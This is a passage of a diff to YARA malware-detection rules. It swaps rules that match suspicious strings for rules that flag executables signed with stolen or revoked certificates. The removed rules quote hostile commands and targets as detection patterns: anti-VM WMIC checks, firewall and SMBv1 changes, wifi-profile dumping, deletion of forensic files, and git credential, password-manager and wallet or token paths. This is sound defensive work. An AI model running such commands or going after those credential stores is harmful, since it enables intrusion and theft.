+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "57344ff4-5204-535a-a128-0f9f7eb7c760"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "c7533bc5-7d83-550e-a36c-eb459f2be842"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1955-L1977"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6255-L6266"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c34b23e26df0d33d60cf87e406dfbc90f9fd6df0da4415b6622d477cf38bc024"
-		score = 40
-		quality = 45
+		logic_hash = "448527bcbe2851bffefabe06a58e3ca68c092a2080041c51acacad3d5119aa0c"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "eca61ad880741629967004bfc40bf8df6c9f0794"
 		importance = 20
 
-	strings:
-		$s1 = "vmci.s" fullword ascii wide
-		$s2 = "vmmemc" fullword ascii wide
-		$s3 = "qemu-ga.exe" fullword ascii wide
-		$s4 = "qga.exe" fullword ascii wide
-		$s5 = "windanr.exe" fullword ascii wide
-		$s6 = "vboxservice.exe" fullword ascii wide
-		$s7 = "vboxtray.exe" fullword ascii wide
-		$s8 = "vmtoolsd.exe" fullword ascii wide
-		$s9 = "prl_tools.exe" fullword ascii wide
-		$s10 = "7869.vmt" fullword ascii wide
-		$s11 = "qemu" fullword ascii wide
-		$s12 = "virtio" fullword ascii wide
-		$s13 = "vmware" fullword ascii wide
-		$s14 = "vbox" fullword ascii wide
-		$s15 = "%systemroot%\\system32\\ntdll.dll" fullword ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mht Holding Vinderup ApS" and pe.signatures [ i ] . serial == "00:a7:3b:6d:82:1f:84:db:44:51:d6:ee:dd:62:c4:28:48" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Antivm_WMIC : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_500D76B1B4Bfaf4A131F027668Fea2D3 : FILE
 {
 	meta:
-		description = "Detects memory artifacts referencing WMIC commands for anti-VM checks"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f7166171-15b7-5e11-bbec-355764e58caa"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "670138fc-7f2f-5145-8488-196912292ef7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1979-L1989"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6268-L6279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2c26ea8b008bf9cb4d8e24c909a3c6f5d67783b483747268f949fadc3fa72532"
-		score = 40
-		quality = 39
+		logic_hash = "a4f626e5ae9d273723814b0d944b067e70714e10776600a1bd0f90af31c1146a"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "fa491e71d98c7e598e32628a6272a005df86b196"
 		importance = 20
 
-	strings:
-		$s1 = "wmic process where \"name like '%vmwp%'\"" ascii wide nocase
-		$s2 = "wmic process where \"name like '%virtualbox%'\"" ascii wide nocase
-		$s3 = "wmic process where \"name like '%vbox%'\"" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FviSBJQX" and pe.signatures [ i ] . serial == "50:0d:76:b1:b4:bf:af:4a:13:1f:02:76:68:fe:a2:d3" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Enablesmbv1 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_54Cd7Ae1C27F1421136Ed25088F4979A : FILE
 {
 	meta:
-		description = "Detects binaries with PowerShell command enabling SMBv1"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cb3b43f3-8f45-5e4e-8e5e-9bfb89e842d3"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "2f7a0a34-6650-59d1-acf9-5ded0317ee6f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1991-L1999"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6281-L6292"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68eb41d843b39e784d99153607c1deecdb5258cdbf641e2dd177c364847d85b1"
-		score = 40
-		quality = 43
+		logic_hash = "2b94ccd7f85a2b21edaf4b28f14827b399cdb82307c20320f77eb775c05751f1"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "acde047c3d7b22f87d0e6d07fe0a3b734ad5f8ac"
 		importance = 20
 
-	strings:
-		$s1 = "Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Enablenetworkdiscovery : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65Efa92A4164A3A2D888B5Cf8Ff073C8 : FILE
 {
 	meta:
-		description = "Detects binaries manipulating Windows firewall to enable permissive network discovery"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b1203e7a-b4f3-587e-aaea-a4cccaedc07d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "07392a87-7d81-58c1-8dd6-2a9cbc8caa6b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2001-L2010"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6294-L6305"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6c28a33849d1c6c72b65926a81e96f0e3f5b9bb0a48739bf4240a16f6a10dcea"
-		score = 40
-		quality = 41
+		logic_hash = "189f154d5b71bea9c06cd2c79d2460a1fb8cc9e0670a9ef8545e3abad80c8a06"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "928246cd6a0ee66095a43ae06a696b4c63c6ac24"
 		importance = 20
 
-	strings:
-		$s1 = "netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes" ascii wide nocase
-		$s2 = "netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghisler Software GmbH" and pe.signatures [ i ] . serial == "65:ef:a9:2a:41:64:a3:a2:d8:88:b5:cf:8f:f0:73:c8" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Authapps : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ad0A958Cdf188Bed43154A54Bf23Afba : FILE
 {
 	meta:
-		description = "Detects executables referencing many authentication apps. Observed in information stealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b2c1307d-ac4a-567f-ab14-7c65e16d984e"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "0b42f6fd-732c-5802-b616-774a1da9e3aa"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2012-L2021"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6307-L6321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9c730ba532dca023821fd9073bffeecf099a2a956b7715421bd0b4e5e5d4b2cf"
-		score = 40
-		quality = 41
+		logic_hash = "6031cb276cbb419789a3f3e57654dd9569feb612b0aebc2b72ae8b644f07bca9"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "7d851e785ad44eb15d5cdf9c33e10fe8f49616e8"
 		importance = 20
 
-	strings:
-		$s1 = "WinAuth\\winauth.xml" ascii wide nocase
-		$s2 = "Authy Desktop\\Local" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Undocumented_Winapi_Kerberos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_05Abac07F8D0Ce567F7D75Ee047Efee2 : FILE
 {
 	meta:
-		description = "Detects executables referencing undocumented kerberos Windows APIs and obsereved in malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1eb7faab-66b8-5d98-b6a8-75a078c2f6f8"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "17355de3-08a9-585d-bc4f-fd16ff59e2a2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2054-L2068"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6323-L6334"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19f22dcbc63723624d92be22cd69dcbab03a0b46299d43bc50ba73c79e573596"
-		score = 40
-		quality = 35
+		logic_hash = "0196ebd0b5821863c99676907a972e214f46411650fe20557e9f919609d12659"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "68b32eac87652af4172e40e3764477437e5a5ce9"
 		importance = 20
 
-	strings:
-		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
-		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
-		$kdc3 = "KerbFreeKey" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $kdc* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ultrareach Internet Corp." and pe.signatures [ i ] . serial == "05:ab:ac:07:f8:d0:ce:56:7f:7d:75:ee:04:7e:fe:e2" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_NKN_BCP2P : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_62165B335C13A1A847Ce9Acff2B29368 : FILE
 {
 	meta:
-		description = "Detects executables referencing NKN Blockchain P2P network"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "21aa4034-8c8f-515e-b8a4-4ce32ad816a6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "62cd9a29-023d-5ff4-89cf-a2e74ec66ac4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2070-L2086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6336-L6347"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "98161fcac130ba758bd9f8c4bc7133b9ba862df61dd86ad7d0ecbb0f18813a5e"
-		score = 40
-		quality = 45
+		logic_hash = "19e189c49f435f8b2aca0944d0f648a4126f83b7498982a262230e2f69ada8b7"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "c4cfd244d5148c5b03cac093d49af723252b643c"
 		importance = 20
 
-	strings:
-		$x1 = "/nknorg/nkn-sdk-go." ascii
-		$x2 = "://seed.nkn.org" ascii
-		$x3 = "/nknorg/nkn/" ascii
-		$s1 = ").NewNanoPayClaimer" ascii
-		$s2 = ").IncrementAmount" ascii
-		$s3 = ").BalanceByAddress" ascii
-		$s4 = ").TransferName" ascii
-		$s5 = ".GetWsAddr" ascii
-		$s6 = ".GetNodeStateContext" ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "t55555Prh" and pe.signatures [ i ] . serial == "62:16:5b:33:5c:13:a1:a8:47:ce:9a:cf:f2:b2:93:68" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Passwordmanagers : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4Cdffb4F02C55Ae60A099652605Da274 : FILE
 {
 	meta:
-		description = "Detects executables referencing many Password Manager software clients. Observed in infostealers"
+		description = "Enigma Protector Demo Certificate"
 		author = "ditekSHen"
-		id = "4da7bf22-fdd7-53b7-bdfc-da7ac5657f6f"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "843929be-68e5-56b0-99fc-f5d71b91c3cf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2088-L2099"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6366-L6377"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d2f7739282611166a7e06d96345c46df92500b387d9f940169d5ee6664ea5ad"
-		score = 40
-		quality = 37
+		logic_hash = "1b655f42302bed2091aaa5d37156c68eaf812f0c287bf42b24942a8b845b7476"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4a2d33148aadf947775a15f50535842633cc3442"
 		importance = 20
 
-	strings:
-		$s1 = "1Password\\" ascii wide nocase
-		$s2 = "Dashlane\\" ascii wide nocase
-		$s3 = "nordpass*.sqlite" ascii wide nocase
-		$s4 = "RoboForm\\" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMO" and pe.signatures [ i ] . serial == "4c:df:fb:4f:02:c5:5a:e6:0a:09:96:52:60:5d:a2:74" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Wirelessnetreccon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_25Ad5Ae68C38Ad1021086F4Ffc8Ba470 : FILE
 {
 	meta:
-		description = "Detects executables with interest in wireless interface using netsh"
+		description = "Enigma Protector CA Certificate"
 		author = "ditekSHen"
-		id = "15515523-fe53-5512-95f3-79d0695e7da0"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "6f1c6d3a-72a1-5c70-9c7d-1616b13767cd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2101-L2111"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6379-L6390"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8614a8c11e3797e7d7fb7ec2c0705fafc98ce50714e48798594e6fb5bfc1789"
-		score = 40
-		quality = 39
+		logic_hash = "80b67b804e47fba825fabfee39f9a0aae78a4465b088c28b6f6972acd614bb89"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "a04c0281bc2203a95ef9bd6d9736486449d80905"
 		importance = 20
 
-	strings:
-		$s1 = "netsh wlan show profile" ascii wide nocase
-		$s2 = "netsh wlan show profile name=" ascii wide nocase
-		$s3 = "netsh wlan show networks mode=bssid" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:ad:5a:e6:8c:38:ad:10:21:08:6f:4f:fc:8b:a4:70" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Gitconfdata : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_277Cd16De5D61B9398B645Afe41C09C7 : FILE
 {
 	meta:
-		description = "Detects executables referencing potentially confidential GIT artifacts. Observed in infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5462491b-f1cf-55ae-b120-ed09eb9549bc"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "d5ada3bf-322a-5794-aff7-75ff8dd9a7d1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2113-L2125"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6392-L6403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d8b370ea31fade4f6f4ae12903e40026d806862f6c4a7b5818e3942b6b849fd2"
-		score = 40
-		quality = 41
+		logic_hash = "dccfd52a3bcc11897d05f5450600dbd2f1f699732341cebed6dda37a76fd5f2d"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "11a18b9ba48e2b715202def00c2005a394786b23"
 		importance = 20
 
-	strings:
-		$s1 = "GithubDesktop\\Local Storage" ascii wide nocase
-		$s2 = "GitHub Desktop\\Local Storage" ascii wide nocase
-		$s3 = ".git-credentials" ascii wide
-		$s4 = ".config\\git\\credentials" ascii wide
-		$s5 = ".gitconfig" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Reversed : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_066276Af2F2C7E246D3B1Cab1B4Aa42E : FILE
 {
 	meta:
-		description = "Detects reversed executables. Observed N-stage drop"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "765b1983-8831-5f7d-9cbd-90af0cd452f7"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "32b8e28b-361f-53e5-b06c-504dd9e86ae9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2127-L2135"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6405-L6416"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d031f59b201f5c5c9b69bbbe277cc10c3b5ed8427c5c2f679fdd33c8bc41501"
-		score = 40
-		quality = 45
+		logic_hash = "2a554105ae99de388621adefb2f53d2d0873ac3175ca2ccf00fc6a498ea2fd29"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "dee5ca4be94a8737c85bbee27bd9d81b235fb700"
 		importance = 20
 
-	strings:
-		$s1 = "edom SOD ni nur eb tonnac margorp sihT" ascii
-
 	condition:
-		uint16( filesize - 0x2 ) == 0x4d5a and $s1
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICOUS_EXE_UNC_Regex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_289051A83F350A2C600187C99B6C0A73 : FILE
 {
 	meta:
-		description = "Detects executables with considerable number of regexes often observed in infostealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "968ed633-46ed-5efe-84e5-64718f89fb0a"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "f84a7749-a487-52e5-813b-e376ccde13d1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2279-L2308"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6418-L6429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9201469952c2cacebbcbf6801e2c22d018f36742ffbefedc8ee4aa34f413334a"
+		logic_hash = "f094e923dc53cc1edc6ac83cf69fb60fd3c564606a5bfb68facb482918399799"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4e075adea8c1bcb9d10904203ab81965f4912ff0"
 		importance = 20
 
-	strings:
-		$s1 = "^((8|\\+7|\\+380|\\+375|\\+373)[\\- ]?)?(\\(?\\d{3}\\)?[\\- ]?)?[\\d\\- ]{7,10}$" ascii wide
-		$s2 = "(^(1|3)(?=.*[0-9])(?=.*[a-zA-Z])[\\da-zA-Z]{27,34}?[\\d\\- ])|(^(1|3)(?=.*[0-9])(?=.*[a-zA-Z])[\\da-zA-Z]{27,34})$" ascii wide
-		$s3 = "(^L[A-Za-z0-9]{32,34}?[\\d\\- ])|(^L[A-Za-z0-9]{32,34})$" ascii wide
-		$s4 = "(^q[A-Za-z0-9\\:]{32,54}?[\\d\\- ])|(^q[A-Za-z0-9\\:]{32,54})$" ascii wide
-		$s5 = "^(P|p){1}[0-9]?[\\d\\- ]{7,15}|.+@.+\\..+$" ascii wide
-		$s6 = "(^0x[A-Za-z0-9]{40,42}?[\\d\\- ])|(^0x[A-Za-z0-9]{40,42})$" ascii wide
-		$s7 = "(^X[A-Za-z0-9]{32,34}?[\\d\\- ])|(^X[A-Za-z0-9]{32,34})$" ascii wide
-		$s8 = "^41001[0-9]?[\\d\\- ]{7,11}$" ascii wide
-		$s9 = "^R[0-9]?[\\d\\- ]{12,13}$" ascii wide
-		$s10 = "^Z[0-9]?[\\d\\- ]{12,13}$" ascii wide
-		$s11 = "(^(GD|GC)[A-Z0-9]{54,56}?[\\d\\- ])|(^(GD|GC)[A-Z0-9]{54,56})$" ascii wide
-		$s12 = "(^A[A-Za-z0-9]{32,34}?[\\d\\- ])|(^A[A-Za-z0-9]{32,34})$" ascii wide
-		$s13 = "(^t[A-Za-z0-9]{32,36}?[\\d\\- ])|(^t[A-Za-z0-9]{32,36})$" ascii wide
-		$s14 = "(^r[A-Za-z0-9]{32,34}?[\\d\\- ])|(^r[A-Za-z0-9]{32,34})$" ascii wide
-		$s15 = "(^G[A-Za-z0-9]{32,35}?[\\d\\- ])|(^G[A-Za-z0-9]{32,35})$" ascii wide
-		$s16 = "(^D[A-Za-z0-9]{32,35}?[\\d\\- ])|(^D[A-Za-z0-9]{32,35})$" ascii wide
-		$s17 = "(^(T[A-Z])[A-Za-z0-9]{32,35}?[\\d\\- ])|(^(T[A-Z])[A-Za-z0-9]{32,35})$" ascii wide
-		$s18 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" ascii wide
-		$s19 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" ascii wide
-		$s20 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" ascii wide
-		$s21 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" ascii wide
-		$s22 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deleterecentitems : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_25A28E418Ef2D55B87Ee715B42Afbedb : FILE
 {
 	meta:
-		description = "Detects executables embedding anti-forensic artifacts of deleting Windows Recent Items"
+		description = "VMProtect Software CA Certificate"
 		author = "ditekSHen"
-		id = "58a14ad6-8f32-54d8-b343-88629af8810b"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "dc0b80f1-c720-5d83-a92b-144b1fd05138"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2310-L2321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6431-L6442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "01efada47910a345e7bde4e9295754aefec38355193f45c4630f55050d835cd9"
-		score = 40
-		quality = 37
+		logic_hash = "be40d3b202b400eda7e78280b674823f789e292a35f0892ab3a323d1b055e789"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "14e375bd4a40ddd3310e05328dda16e84bac6d34"
 		importance = 20
 
-	strings:
-		$s1 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii wide nocase
-		$s2 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii wide nocase
-		$s3 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii wide nocase
-		$s4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:a2:8e:41:8e:f2:d5:5b:87:ee:71:5b:42:af:be:db" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deletewindefenderquarantinefiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Vmprotect_Client : FILE
 {
 	meta:
-		description = "Detects executables embedding anti-forensic artifacts of deleting Windows defender quarantine files"
+		description = "VMProtect Client Certificate"
 		author = "ditekSHen"
-		id = "a2b5c531-4e51-5c44-838b-3dffc2ed0263"
-		date = "2024-06-08"
-		modified = "2024-06-08"
